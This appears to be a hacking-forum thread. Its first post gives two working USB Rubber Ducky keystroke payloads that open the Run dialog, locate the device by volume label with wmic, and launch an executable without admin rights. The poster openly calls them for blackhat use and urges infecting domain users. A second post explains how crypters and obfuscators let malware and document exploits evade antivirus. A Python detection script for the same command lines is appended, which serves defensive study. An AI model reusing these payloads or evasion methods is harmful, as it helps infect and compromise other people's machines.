AgentGod

  1. For a long time I have been searching around for a payload like this, but the only thing I found was the following: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---runexe-from-sd

     Which essentially is not even 10% efficient. You need administrative rights to use the payload above (Diskpart), and what's with the VBS? If you really do want to execute and run, you do not need to put the file in temp. You can put your file in a WinRAR SFX, which will put your malware into whichever folder you wish and run it there. A tutorial on that will come later, as I have too much to do.

     The payload below takes 3-4 seconds before executing. You have to remount (plug in the Rubber Ducky, let it install drivers, then replug it and have your file be executed).

         DELAY 3000
         GUI r
         DELAY 100
         STRING cmd /c for /f %a in ('wmic logicaldisk get volumename^, name ^| find "DUCKY"') do start "" /D %a\ %a\DUCKY.exe
         DELAY 10
         ENTER

     That one is one of the codes, simple AF. It goes into the Run line, uses the wmic logicaldisk command to search for the drive name of anything you want (Ducky) and executes it in a matter of seconds. I believe the terminal is up for a matter of seconds, not even that. You can use the Twin Ducky to have your file stored on your ducky. I believe you can loop the command above so you do not need to replug, but it will just take long and is not worth it.

     This is another code, does the same, but is shorter:

         DELAY 3000
         GUI r
         DELAY 100
         cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exe
         DELAY 10
         ENTER

     The code above is almost instant (depends on your malware size).

     And yes, this payload is meant for Blackhat activity. If you do edit it, do give proper credits. New scripts will come, making it easier for all of us to execute our files, going back to normal fast Autorun, not a 3 page long script that takes 15 minutes to execute. I forgot to mention, this does not require administrative rights, so no need to bypass the freaking UAC problems.

     And go on infect domain users. WinRAR SFX:
  2. This is not true. Obfuscation works in a way that it adds bullshit code to the malware (if it's malware you have) and can make it Scantime FUD (meaning if the AV scans it, it won't get detected), while if you run the same file that you just obfuscated, it will not run if your "malware" is actually Runtime Detected. What a crypter does is to add dead code as you said, just like the obfuscator. An obfuscator changes variable names and such, while a crypter has 2 parts: the builder and the stub. The builder encrypts your server and binds it with the stub. When run, the stub decrypts your server and injects your server into another process to be run. Obfuscators should not be used to hide malware; they are really for people to make their .exe's less 'decompileable', so the source code of the program will not be found/leaked. I myself use obfuscators for PDF and Doc exploits, something which you can't crypt, but using an obfuscator you can easily bypass a few AVs.
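Seen from the defender's side, the two Run-dialog command lines in the first post leave the same trace in process-creation logging: a `for /f` loop over WMIC volume-label output whose loop variable is then handed to `start`. The detection sketch below is an added example, not part of either post; the event field names follow Sysmon Event ID 1, the sample events are constructed, and treating `explorer.exe` as the parent of Run-dialog launches is an assumption to confirm in your own telemetry.

```python
import re

# Signals taken from the two command lines quoted in the first post.
# Carets are stripped first because cmd.exe treats ^ as an escape character.
WMIC_ENUM = re.compile(r"\bwmic(\.exe)?\s+(logicaldisk|volume)\b.*\bget\b.*\b(volumename|label)\b")
FOR_LOOP = re.compile(r"\bfor\s+/f\b.*%{1,2}(\w)\s+in\s*\(")
START_FROM_VAR = re.compile(r"\bdo\s+start\b.*%{1,2}(\w)\\")

def normalize(cmdline):
    """Lower-case, drop cmd.exe caret escapes, collapse whitespace."""
    return re.sub(r"\s+", " ", cmdline.replace("^", "").lower()).strip()

def score_event(event):
    """Return the reasons a process-creation event resembles the payload."""
    cmd = normalize(event.get("CommandLine", ""))
    reasons = []
    loop, start = FOR_LOOP.search(cmd), START_FROM_VAR.search(cmd)
    if WMIC_ENUM.search(cmd):
        reasons.append("wmic volume-label enumeration")
    if loop and start and loop.group(1) == start.group(1):
        reasons.append("start from for /f loop variable")
    # Assumption: commands typed into the Run dialog are children of explorer.exe.
    if reasons and event.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        reasons.append("launched from explorer.exe (Run dialog)")
    return reasons

def detect(events, threshold=2):
    """Return (command line, reasons) for events with at least `threshold` signals."""
    scored = [(e.get("CommandLine", ""), score_event(e)) for e in events]
    return [(c, r) for c, r in scored if len(r) >= threshold]

# Constructed sample events (Sysmon Event ID 1 field names; values are made up).
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    {"ParentImage": EXPLORER, "CommandLine": r'''cmd /c for /f %a in ('wmic logicaldisk get volumename^, name ^| find "DUCKY"') do start "" /D %a\ %a\DUCKY.exe'''},
    {"ParentImage": EXPLORER, "CommandLine": r'''cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exe'''},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": "wmic logicaldisk get volumename, name"},
    {"ParentImage": EXPLORER, "CommandLine": r"cmd.exe /c for /f %i in ('dir /b C:\Temp') do echo %i"},
]

if __name__ == "__main__":
    for cmdline, reasons in detect(SAMPLE_EVENTS):
        print(reasons, "<-", cmdline)
```

The default threshold of 2 leaves an administrator's plain `wmic logicaldisk get volumename, name` inventory query unflagged; it carries only the enumeration signal.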